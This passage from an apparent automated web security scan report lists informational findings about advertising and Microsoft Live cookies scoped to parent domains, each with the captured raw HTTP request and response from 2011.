i+JWTTN5BEC2oVUSOm+DkjDwDmlS4Hz9eUiaKuXCh6blZMbaXYlUK/GFNSVdp4EYXMfrfMLBceVCXTfe7LQZqqhrfNmKNvC2WIs0eIzQTSgkyE36ExeASfIYxBgagH66xfGtChImtoAnNoskXmGUXrmuWJmr2n1DqtIW+/IFRaM6JfhifD3SjlKJmiTEmZjhIc3K+uW15qQX524DCQnzR2ZX4FEn4rclF5DjvL1rv+5FREvo9+qJBWm74HUesCoVStJe7UHxiSWA/7iGfZxRgTU9xrnI6nbxd57VGB+iMH6MYCJXx95CX61m0Chvi/BS14Kl+oYDdVzCRyzwqTU7ykQ1TCtHEsLTUSPnT/sp0BifI4+ITf1Cd8GjptO34kHnY+9erfMTd5pz7fQ91twXO4NBBrUhsuTCebHYMH7rlZ2gInE5iHG0sCBWhVQeqml5PtdICBJDbucuytN+yARfx0cgwFpuryaNN823YEwkwmuy42AbSkyYymy+UGkDe3iq9KhhcXsjXekJcNnCY4e0ggZYe0eDC7OrNjnGppcRcRfNmlUmHFWJ0t5iS/8rFZ7r9nqV3L+Ks+k/Bfw04L6cYnyIU8Ft9vb6Q+YFJ+MIsfKIP19v/KvwZ4huw5xfbVWRKmP1LGRwCzp0KpZWvnOu/5LBgEIurRKFkr9C0OlRtK9YahWGUHb295fCsejDj9h6ITQdvtk1gdUtdd146g/fAwBiThZSrnTvQtfx1hoOTfOMmfS3Iu8AOgikXw8fJIq24TTJK/JfU/Kle1+vzZrBlMFh5Afh1qja0MHBO6o+I1PtKJQkEvLHnUFNuI1LX3W76LssPpRcxqeQ0ico/22esLnjurcGcDzkCt8bxzJ0XCy/hxiYaQZj2c4odprBmARwbAGMFZ8XvyF9xuey67n6bQ9ndxHRkFxXSB8dj6BtCWdaj26k4HJebjrba5UFlvfK/uYH+hSNaB5lc8Lpoo34WHmy+EwTtbDTZe8sX09JNOtDEt7CSh7a5ud1hDn0gOtf6iySYsT7jV2PnEs4dkVQ8ICOwhNBN2tYE95VOLcCOn36yldnpYLJbjXs58A7OAHop2IpDc4m8280xku0k8oHIeR5AC5BKl+RhW5IMqrDwA8arsFlx/IxAe6T991EglpgFwoUTNNOKD39is3z9p5xBjEuwn0SIYIO/65chkmsaj0lw74GfX4hNA3WhKg==; rsiPus_kpxr="MLsXtSUNZzhvJpH4+tKkOoj8ntlBfYhpEw27Sgdm26iivu1jMXrkolpihGBj4llhxoQ3etX0vIp6oTU6utPqiiY+q0sx9SZq3j9cxNBBOTGkTUzMMcfOycMr/RCdSAZbrYe7MR41Ml8P0TCrYF9UtXf6D83ChO020avNadiJ0sMNIxbXO9TZCAjf/B0U1QBTGISffV1CXeQy/Q9+Vsi1tAFjh63CWoW7lbQ1X+MM22FfbwuxngshaR0fwX/fD4W+yJj7/VWRRLYCYuhPcnKafgAst0jtLE2+Wf8kEa39J7+bN6XUByr7MX11X+aNOsJpqBYZU+6PWTFj0xxCVlJeC0H2nJ8/7vjk0U1lqVwFbfETfD25gPv0d2qBQfqzxSyR+jgdm/cye29eCnCatgRbhuRHomyUj/leb0nNtKuAIULlNeYV/gmjkZRDcj2uROQpryf7ex2bihe1gZSbYjZNrhak7q1+6hKGf6HOuM/baUhUMxe9/tF5Y7253PUv1YhZo6/80WO1vvW1yOobrIxtrdxXgDTiEkg+JHfmGdJbdNjWTnDSlwdtk9aL5TM6m74RiKi5XGC4b7u3yJT5S/AuvvgRBAHbAPCRCK6AyIFM5sL/76HM3rAmJoxjITkzacdFyI2MsH461K6ogE96hFMGAQZ58FhBsueAh9zwYYTa4WE0uj14mgUez3U4OO3OIBsNSmwdDAzjJ/LfTVWJC0KbxQF4wTVviqKj2hgaE6Oh1pzLmPv1EL8bTJnB5xiMHUgesx7wqtKQ2fl5o6PFAQUIvzdGkYBnEpNfDYz+FLWjKYxhb6ZL1MiU+aDmtXvtg8HZ6ghqHQjD4aMO749hTnc8Y8YtOlKc1IK2PtzGq1oxPJ+7weDGtjC/tKJdZpuH37zztp7oTkZEVNlv8T0JmM4AY/tYnhVf1cMLlDd5sX8/VYGbrkqKt2epyPZXnM+u9sfu2KuFOSd6D987kxMpi9vpw7N2CXi/3bTpgQc98nIcQMfUMKPt7BLH/F92yTjQDu2+2r2xLec53j0aQPOtjOXx1wU03jNtASF4RMjKkRQTgtaMp7PYKzNktZ787iF1qnjt0JA+LKNZx8cGOwgkQkSA/1plqde04kE3cfFRfHiVAtvEb4Oyv8pDUPkVjJMP1El6/XVauEAQmHKrURNiy1/1HwVGsfUASmo0Yjw+DOURA8j7F87INyrKpWwx+gz9OaG5yKVgeO/oeTiahjHeqtdGAhjT/bBR3JjQxhIBejVRTjc7RBl/shL4DEPlMvPoIzR5PfzKBQg082EG+cx7sYQApbog7ugl+RbMx+2KF9v8Wm1LHfB6q02BJzThLXcpT3ecL5eqrCxf6uaSDZmvhAFXF6m4KOc1Vua0Y1O4l0hu8D7f6De2oBu+ULi1otwrO4Z8ImdH+xwHPSk18RmJBfTJqO1PetNV/rVZYuNoP0D6Vb4FTPdGqt63p5RwNgUMCeHJBmWFWYrt8arKwK5zd6HeIeQ1ADg4yO2ij1GRKOLEWt6pBlZLuCqPm0OvD8LoqWoWOE31dSCyZXRyBXBgcY77tFuSLo7cjSu7M3YR"; rsi_us_1000000="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"; udm_0=MLv3NCEpbgpn34xwb+t4i0a3cgXtVLCla0EkErcT0mFBLMnR0C8SwiSd9pwq6b/urQy6uwL5rPtS5VxWx3Av+lIK0Lkpaj4N0MO2DnhUU4jP9xhTmoHoo0Y+f+q8hN+oFLyOmbud0hz+jq+cMwoghUynYwrgNtd+Agap/FTLc7CKGnJlB+2sP1urgbhTgD8dotZ4m56OVucAdbLbNgNMDtOQq9gJGEepfG8VW1Q9a5rIwEWo6XIMCluZo5KWK7KJpXdKAuMdT0asQPYcVvVrO2UUzxrvO5ZVIHEgPywOJ5do5WC2Q0/NcF2shDO+QqXWJdbX0OqMCfCp/uF1DI8mTtMKSOzEDgZLk+53ghmHpNlezwaRq24n3yk1axI/i4b0N9csYVpsaAUU4uyKMoWlj00kD3c2UwUiXRlylO9GVaUWDOdxl1h2tF635L8pmba2LwiVetWos0VrtRJlUmO1ehLqwSW4EKEEcT1d1To6b4bDwQqyboO20/CC91ImnZSY7f4dk+Fkg0a/iqt7HSzUf2P/bKQuLhMJR4Knq3s8RacbfTWCuKlYBEJAz+C2bkNJqUf4oZaeXZGWBH99QC8Kq3iPoMvS6/eEAZXXF25Cc5tiWi6bvIzGGduB4chYRZXmCwczXutrmI0mdYim/t0EiV3MiddLLCiwPdaARbD+dleQ7aYZZc0IWJDrUAUoqq6BNFHqZQOaoMq0c2Vdvfoyq2gE65uykjGK8DI0fQ6W0LZV/KMW+bsDCKsOfz+Ch73anSmjzQ4N2mtfQACJzfk9EWBNM9K5yTbQDP/ZDJ/8zYyErcuaX/MTs1RU5N5DeU0aAmkpYJ9thW/Hya0qFvYladCiAuWtUPOrqpcyHKJPhFT9S9HCVHVMj3nZyx0z/91FO96gSu1bjwC1k54v0ek3ge3GY4Tosdejf4GUDkRMDeGtP/O/P23UhOcwcG29rPMIxD0imB5ApBEJHRsYN43ewlfT9vlcTTPx3Qihj66o/Chm4BPtAk9t25PfQLvbLkRSsruCX9+OdKjyYq+SzvBRWlhHPO8ZSqSXntrC0QOntJkQEIKIuYAC6+qY93TunGvCP99YcUu3CJVkmsbYN+Z5/84Q1V3ByyguogZxtBkUNrBOObpCkTAXnHmtBZu5Kqm7rHy9fTkErq2IhUY1YJqszajUzu0pnqOVrr8jTIo2TEJtgt3BdnvhPEhCLoK/tNiYa8XArAO/qbLAzFHFwe3eti49gHeYkMoRyy6gVrH5qdgFcqa0YlQJiQ8XgE2XCYqnJsDnGrEFxVz5s8Y6t369w9ih76FWbImv5nAazRPQE+R15Ge7Ar1R2tkE7fuLhxj0De9ywsX84Hqjq0nGEK4HZczwHAWH7HMyIqhm4sGgPjSpwGvB8dhrk2yXb7nG3qYnMLWeIXiuyNlCi5rjvnpEfQBOFLGvK9HN8srFj0xIopOeHeqR+QvHGiHzBpPF

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPF4z+huXIMH/C1v6FY5BD9CU6du67BSrLzzGDKYyVi7wuMG8EbAQsYoAM+8HjFdJuNxGA3/+CrpcbtEHZ/d6C7jbvv7M0vNWHRu7UTOWGMPgDtQnUJM+3UN3RAdHmCWWZdidYJ29FVf84FRt54yfn0DxXbewqnOCDFkhcpfrbm9qrWCYvAexDPzC3J2PvZfsy0paqKtZwkSPNwYDH58Nnxwd6fWe5R4HtXeze5eYPpOFwxneozVU7HcSJhRznJKY+nbXFV4Kh9TuLjJidiEALKqZqYEUfWBBwCHLNgWNCsDVbbrOurIU2np0szXUis/sUiQzf0Wf6hEdcVHk25x1YopVaDeVCwaNCIsECWnmpdYStYgcflX2fOyqpvQXpFuKLMZM26a7Cnv+bGk86zFfrtsmZ+XUjOCjCgV9VZAJLI6r/wby1TkeEYM4aKVRAcjOSNaSUouN6aq0UDfofVwofJbdaDfqnlskad6jL2nkV2oqYYN51bbjRrBJ5Zx/iFkNxeA80dBln8t7npPdnnutFI020xW6Pikz/y3wzF3Zn7ODNfmnnrXoxV2IA89MfIixDVxod6TnBvbAyjrHfxPZXpR9VpSkdunpDbZbQ0tkL4iwjlo4ovwa0wlZD7dl0qzpqpDVDzgG/K5a0fKdDgHqN06JXJDXihsaxG61k8V69rDg9gZRx72LYSDFbS+5iLzyhgdsmnsBb9i/GVpAizi/0VFp8PPCMlLuz7hDOGo+yUwLowBr0K6Cp6; Domain=.revsci.net; Expires=Wed, 18-Jul-2012 16:02:40 GMT; Path=/
Set-Cookie: udm_0=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: udm_0=MLv3NyEJZgpn3xSpL5u85NM5XwnsM3MjKdVcqB/a12JILatz1/QkamTspbLrwKiJ0kHW/5AU3oTEjmWXYWp2M0xUL7+WY6kjOrURsVDi62hpYV7xR6QBhj0v+pyJD3OJXK+vmR6dmK3bv866m5dV/8S0o9vxNmpKALSQclbLyFOiUbYzEkzSx6gD/xYdErrYRbvJrxQrHocSZW8IWgCBo1ZMKF3XAoyFrdWONbkKqPtnL+Tf6LeOnc/8RbibirISpR8EIRZg0bai/lhsQDUpwOFeZfVq4ADms+6bYXKqD9JyHXg0ZwDRrCWhBl1ue1BqVAn3Cr/Bwx8/fgf4osdRhn5YjD5/Y+PY6RExqP8RcxgTNdXx9V9Xq7fP8/CxpD2d4Ncg3Lwb6WRoh1vRm87/tMbWsUCyqUEjHcs9AEPUYjcC1xfTW9GtjTlaABUuUrmGg2itWP7OmRmHnGY1AG7z8DLn/+VDv99nV2ZqSoL3ECBGo5Gp+CmR/+82s/rVel/YnKz/XNzeezOmflNl/ISF2iEFYbSKl4jL2Imw3DcEFYr9gLF7thJxa959CXKjgznlBeDDDam6bQwtXdKwxq68WOD0JfNzPCFtxZ/3ySVIchlyyEMGK4ru9sNL2qhk7ThVsbKzGx3w5WC0tnxRyUM3wF7AFcroI1cVBCQX8UDlCNyuqP1eE9UH0lr8hQ9hH+eytjUTNHl50185XTe8k2I3KTCCC3V/1YUfM3sjwXon8qbgHnWylig/Q/P3gvmTN1uk6+gMf23SzvcZzS2JaZu1hhHc+zLEUQhUX2B2WD2Z1IAQyoj7hwalxN8UjEjE7dDYbkp4UpLD0vea8xMx8AwMSMuOMW+Z2BchxPI3ARZVxVwzU05RiwmP6YN1SIAvcXyk/FKuWo/NY4fTMv4mW6J5GkV7KsoK7zESEFXHC80l/FUrlSjwrgH0F9A4HdrSoCRnacUxrlabJk/bO0nQFQyClplYm45GteUUvB/yFXNWhchR5qNmBBeTnsuLjYG2ZjDj6+gYIPScc6ZJn5y6xJkKyqQDU5eYo9ZDplLH4wjRzgjncZs4b1iuMC4fjmTdUR2cDevLyGC3/dRJ9CcLuov2969ADUaV4qAQC5BiHySEoWnqc2ShEOSXAgSIgS+Eyh1EA8cPHs3CbYp/uQxx+SM1MwVT6OSTygbQTsYBbCJypY6WyLXo8mxytLhWadmEeayScWgFbHGuePFAPRquVFh96dbbF5M9RbLfAuQyLYtEa3eG+mkoAieeEZCt2m5a7NTx+Uc439ZXTiwJlFAahJEUocKPD9gyhsQNp2rpsEhJ5rdXhEIM/fln0zgalBbUBFpcvKtyWA77bjY7eCKH+sdgen0EQayIsR5HPAfq1y0RBst2xOjuOSxHlOrL8RmhvQ35RlgS+Gu73AjceiwRh0Gx1dj9Xu8+xiv2kDaH6RU9nKl1BpSf7tIpjrzjwxE1fe8GeNTkLApO3Ur7SMEtDlGU5e5U7wmQj6TKeaRm1dY/vSYq5TyKIflCXtQZmxEGf//KOjvsyVR3ZP7NK8+AbLMCSQD/OBWjetrucXmOEL9RMLrHQxXH9Vv+WOn5ixorNpStZnFCUQfrej5ibwjEcSVi1fs/7GL5+pUQywVqWob0fcbGF9zOLQJ+tj/rvPzhJXq0YA4x44xOK4w+z2tzIqlkpP+ikADD0I5fH5/0uGt4NbQGMW+JgHWCG9VlVWXq4Fy2CDkyduwyGzBgAyNcK2AcbCUfHePahhOHbixQW0gkUIyYnNVjqJn0tZ9IIQWmk2ynyVd+Eo3kixBSz6KvdGSg8RlOtZl3zHXogg==; Domain=.revsci.net; Expires=Wed, 18-Jul-2012 16:02:40 GMT; Path=/
X-Proc-ms: 2
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Tue, 19 Jul 2011 16:02:40 GMT
Content-Length: 1254

/* AG-develop 12.7.1-48 (2011-07-13 07:11:32 UTC) */
rsinetsegs = ['D08734_72087','D08734_72092','D08734_72133','D08734_72099','D08734_72131','D08734_72435','D08734_72581','D08734_72639','D08734_72674
...[SNIP]...

13.83. http://pixel.quantserve.com/pixel  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.quantserve.com
Path:   /pixel

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pixel;r=498634369;fpan=1;fpa=P0-1586148760-1311106896347;ns=0;url=http%3A%2F%2Frealnetworks.com%2F;ref=http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue;ce=1;je=1;sr=1920x1200x24;enc=n;ogl=;dst=1;et=1311106896345;tzo=300;a=p-bb8mwEIppbU2c HTTP/1.1
Host: pixel.quantserve.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://realnetworks.com/
Cookie: mc=4e092e22-03827-7415b-42309; d=EOABPQGgB4HTDj-aaRQGCBC6MiEShRggELEu09H58sHqSxA

Response

HTTP/1.1 204 No Content
Connection: close
Set-Cookie: d=EMEBPQGhB4HzDj-aaRQGCBC6MiEShRggELEu09H58sHqSxA; expires=Mon, 17-Oct-2011 20:21:30 GMT; path=/; domain=.quantserve.com
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAo PSDo OUR SAMa IND COM NAV"
Cache-Control: private, no-cache, no-store, proxy-revalidate
Pragma: no-cache
Expires: Fri, 04 Aug 1978 12:00:00 GMT
Date: Tue, 19 Jul 2011 20:21:30 GMT
Server: QS


13.84. http://pixel.rubiconproject.com/di.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.rubiconproject.com
Path:   /di.php

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /di.php?v=2372||2373|0||2190||2111|0||2494|0||2189||3577|0||2765||2374||&r=3761|0,3169,3578,3577,2110,2195,2196,2197,2579,2198,4134,3734,2199,2364,2362,2363,2200,3810,2111,2494,2201,3513,2202,2496,2202,2496,2203,2204,2189,2112,2497,2205,2355,2495,5838,3811,3512,2109,3812,2239,2190,2206,2113,2206,2113,4552,2765,6184,2240,4105,4193,2372,2373,2374,2375, HTTP/1.1
Host: pixel.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://support.gamehouse.com/app/answers/detail/a_id/861/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: au=GNQQ9N2W-FJJG-10.204.178.130; lm="20 Jun 2011 13:04:50 GMT"; ruid=154dd07bb6adc1d6f31bfa10^10^1308614585^2915161843; put_1902=NsCNKTbG1n8vl4t9NZDDK2fBjy8vnIx8N5b7JrdL; put_1512=4dd07bc8-e97b-118c-3dec-7b8c5c306530; put_1986=3420415245200633085; put_1185=4325897289836481830; put_2132=E3F32BD05A8DDF4D5646D79640088B; put_2211=2814750682866683; rpb=5575%3D1%265852%3D1%264222%3D1%262114%3D1%264894%3D1%266432%3D1%264212%3D1%264120%3D1%266286%3D1%266811%3D1%26733%3D1%267259%3D1%264706%3D1; rpx=4212%3D11993%2C1032%2C4%2C%2C%265852%3D12124%2C721%2C3%2C%2C%266432%3D12470%2C499%2C2%2C%2C%264222%3D12770%2C86%2C2%2C%2C%265575%3D12844%2C0%2C1%2C%2C%262114%3D12857%2C0%2C1%2C%2C%264894%3D12881%2C0%2C1%2C%2C%266286%3D12945%2C139%2C4%2C%2C%264120%3D13027%2C0%2C1%2C%2C%266811%3D13380%2C0%2C1%2C%2C%267259%3D13546%2C0%2C1%2C%2C%26733%3D13546%2C0%2C1%2C%2C%264706%3D13548%2C0%2C4%2C%2C; cd=false; khaos=GOVBRMNC-I-DXQD

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 20:27:49 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.3
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: rpb=5575%3D1%265852%3D1%264222%3D1%262114%3D1%264894%3D1%266432%3D1%264212%3D1%264120%3D1%266286%3D1%266811%3D1%26733%3D1%267259%3D1%264706%3D1%262372%3D1%262190%3D1%262189%3D1%262765%3D1%262374%3D1; expires=Sun, 15-Jan-2012 20:27:49 GMT; path=/; domain=.rubiconproject.com
Content-Length: 49
Content-Type: image/gif

GIF89a...................!.......,...........T..;

13.85. http://pixel.rubiconproject.com/tap.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.rubiconproject.com
Path:   /tap.php

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /tap.php?v=7259&nid=2211&put=2814750682866683&expires=1 HTTP/1.1
Host: pixel.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://b3.mookie1.com/2/TRACK_Ticketmaster/LN/RTG_SX_NonSecure@Bottom3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: au=GNQQ9N2W-FJJG-10.204.178.130; khaos=GOVBRMNC-I-DXQD; lm="20 Jun 2011 13:04:50 GMT"; ruid=154dd07bb6adc1d6f31bfa10^10^1308614585^2915161843; put_1902=NsCNKTbG1n8vl4t9NZDDK2fBjy8vnIx8N5b7JrdL; put_1512=4dd07bc8-e97b-118c-3dec-7b8c5c306530; cd=false; put_1986=3420415245200633085; put_1185=4325897289836481830; put_2132=E3F32BD05A8DDF4D5646D79640088B; rpx=4212%3D11993%2C1032%2C4%2C%2C%265421%3D11993%2C682%2C3%2C%2C%265852%3D12124%2C721%2C3%2C%2C%264214%3D12267%2C471%2C2%2C%2C%266432%3D12470%2C499%2C2%2C%2C%265576%3D12675%2C0%2C1%2C%2C%265573%3D12675%2C0%2C1%2C%2C%265720%3D12675%2C0%2C1%2C%2C%262372%3D12738%2C0%2C1%2C%2C%267249%3D12753%2C0%2C1%2C%2C%262112%3D12753%2C0%2C1%2C%2C%262497%3D12753%2C0%2C1%2C%2C%262202%3D12753%2C0%2C1%2C%2C%262496%3D12753%2C0%2C1%2C%2C%262197%3D12753%2C0%2C1%2C%2C%262579%3D12753%2C0%2C1%2C%2C%263512%3D12753%2C0%2C1%2C%2C%263810%3D12753%2C0%2C1%2C%2C%262374%3D12753%2C0%2C1%2C%2C%264222%3D12770%2C86%2C2%2C%2C%265575%3D12844%2C0%2C1%2C%2C%262114%3D12857%2C0%2C1%2C%2C%264894%3D12881%2C0%2C1%2C%2C%266286%3D12945%2C139%2C4%2C%2C%264120%3D13027%2C0%2C1%2C%2C%266811%3D13380%2C0%2C1%2C%2C; rpb=5576%3D1%265421%3D1%265573%3D1%265720%3D1%264214%3D1%262372%3D1%262112%3D1%262497%3D1%262202%3D1%262496%3D1%262197%3D1%262579%3D1%263512%3D1%263810%3D1%262374%3D1%267249%3D1%265575%3D1%265852%3D1%264222%3D1%262114%3D1%264894%3D1%266432%3D1%264212%3D1%264120%3D1%266286%3D1%266811%3D1%26733%3D1

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 18:39:10 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.3
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: rpb=5575%3D1%265852%3D1%264222%3D1%262114%3D1%264894%3D1%266432%3D1%264212%3D1%264120%3D1%266286%3D1%266811%3D1%26733%3D1%267259%3D1; expires=Thu, 18-Aug-2011 18:39:10 GMT; path=/; domain=.rubiconproject.com
Set-Cookie: rpx=4212%3D11993%2C1032%2C4%2C%2C%265852%3D12124%2C721%2C3%2C%2C%266432%3D12470%2C499%2C2%2C%2C%264222%3D12770%2C86%2C2%2C%2C%265575%3D12844%2C0%2C1%2C%2C%262114%3D12857%2C0%2C1%2C%2C%264894%3D12881%2C0%2C1%2C%2C%266286%3D12945%2C139%2C4%2C%2C%264120%3D13027%2C0%2C1%2C%2C%266811%3D13380%2C0%2C1%2C%2C%267259%3D13546%2C0%2C2%2C%2C%26733%3D13546%2C0%2C1%2C%2C; expires=Thu, 18-Aug-2011 18:39:10 GMT; path=/; domain=.pixel.rubiconproject.com
Set-Cookie: put_2211=2814750682866683; expires=Wed, 20-Jul-2011 18:39:10 GMT; path=/; domain=.rubiconproject.com
Content-Length: 49
Content-Type: image/gif

GIF89a...................!.......,...........T..;

13.86. http://profile.live.com/badge  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://profile.live.com
Path:   /badge

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /badge?url=http%3A%2F%2Fwww.factset.com%2Fproducts%2Fprivateequity HTTP/1.1
Host: profile.live.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Sample=17; MWTMsgr=1; MUID=E361C23374E642C998D8ABA7166A75EC; sc_clustbl_142=28912e9907a99869; wlidperf=throughput=2&latency=1306

Response

HTTP/1.1 302 Found
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Location: https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1311085824&rver=6.1.6206.0&wp=MBI&wreply=http:%2F%2Fprofile.live.com%2FBadge%2F&lc=1033&id=73625&popupui=1
Server: Microsoft-IIS/7.5
X-Imf: f33f9185-5f49-4875-b2f2-281495bcb886
Set-Cookie: E=P:/gMMiDcUzog=:5crcRXHCG/JAHLgCxcxWv/ztBWJ2uFCnSl1koMpH+wA=:F; domain=.live.com; path=/
X-AspNet-Version: 4.0.30319
Set-Cookie: xidseq=2; domain=.live.com; path=/
Set-Cookie: LD=; domain=.live.com; expires=Tue, 19-Jul-2011 12:50:24 GMT; path=/
Set-Cookie: SABadge=msg=&url=http%3a%2f%2fwww.factset.com%2fproducts%2fprivateequity&title=&description=&screenshot=&ctype=link&swfurl=&height=&width=&emv=; expires=Wed, 20-Jul-2011 14:30:24 GMT; path=/Badge/
Set-Cookie: sc_clustbl_142=00989dfb1d824c3c; domain=profile.live.com; expires=Thu, 18-Aug-2011 14:30:24 GMT; path=/
X-Powered-By: ASP.NET
X-Content-Type-Options: nosniff
X-MSNSERVER: H: BL2XXXXXC613 V: 1 D: 7/13/2011
Date: Tue, 19 Jul 2011 14:30:24 GMT
Content-Length: 314

<html><head><title>Object moved</title></head><body>
